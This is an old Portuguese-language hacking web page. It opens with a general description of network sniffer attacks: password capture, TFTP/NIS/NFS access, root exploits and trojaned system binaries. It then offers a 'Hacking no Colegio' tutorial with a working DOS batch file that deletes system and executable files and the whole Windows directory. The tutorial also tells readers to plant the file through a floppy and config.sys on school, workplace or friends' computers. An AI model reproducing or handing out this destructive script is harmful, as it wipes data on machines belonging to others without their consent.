| |
Ataque
por Monitoração
- Os ataques por monitoração são
baseados em software de monitoração de rede conhecido como "sniffer",
instalado surrepticiamente pelos invasores.
- O sniffer grava os primeiros 128
bytes de cada sessão login, telnet e FTP session vista naquele segmento de
rede local, comprometendo TODO o tráfego de/para qualquer máquina naquele
segmento, bem como o tráfego que passar por aquele segmento.
- Os dados capturados incluem o nome
do host destino, o username e a password.
- A informação é gravada num
arquivo posteriormente recuperado pelo invasor para ter acesso a outras máquinas.
- Em muitos casos os invasores obtem
acesso inicial aos sistemas usando uma das seguintes técnicas:
- Obtem o arquivo de passwords via
TFTP em sistemas impropriamente configurados
- Obtem o arquivo de password de
sistemas rodando versões inseguras do NIS
- Obtem acesso ao sistema de arquivos
locais via pontos exportados para montagem com NFS, sem restrições
- Usam um nome de login e password
capturada por um sniffer rodando em outro sistema.
- Uma vez no sistema, os invasores
obtem privilegios de root explorando vulnerabilidades conhecidas, tal como
rdist, Sun Sparc integer division, e arquivos utmp passíveis de escrita por
todo mundo ou usando uma password de root capturada.
- Eles então instalam o software
sniffer, registrando a informação capturada num arquivo invisível.
- Adicionalemente, eles instalam
cavalos de Troia em substituição e uma ou mais dentre os seguintes
arquivos do sistema, para ocultar sua presença:
- /bin/login
- /usr/etc/in.telnetd
- /usr/kvm/ps
- /usr/ucb/netstat
Hacking
no Colegio
Este texto irá ensinar, de modo fácil,
destruir o computadorzinho da sua escola (ou de amigo, trabalho, etc.).
Primeiro, crie em seu computador um
arquivo de lote (nem precisa compilar), se não souber aí vai, pelo DOS digite:
copy con arquivo.bat |
<enter> |
@echo off |
<enter> |
@echo Frase de sua
preferência |
<enter> |
del *.sys |
<enter> |
del *.exe |
<enter> |
del *.com |
<enter> |
cd windows |
<enter> |
del *.* |
<enter> |
cd\ |
<enter> |
del arquivo.bat |
<enter> |
@echo Frase de sua
preferência |
<enter> |
<tecla F6> |
<enter> |
Pronto, um arquivo vírus de lote foi
criado em seu computador, calmaaaaa!!!! Hehe, ele não fará nada contanto que
você não digite "arquivo" no diretório onde ele está.
Remova este arquivo (arquivo.bat) para
um disquete, junto a ele um "config.sys", com a linha de comando:
C:\arquivo.bat.
Agora é com você! Leve o disquete
para a escoola (trabalho, casa de amigo, etc.) e quando tiver uma oportunidade,
insira o disco na unidade referente (geralmente a:) e copie os arquivos para o
diretório C:\. Pronto! Retire o disco e diga tchau, hehe.
Anterior
Próxima
|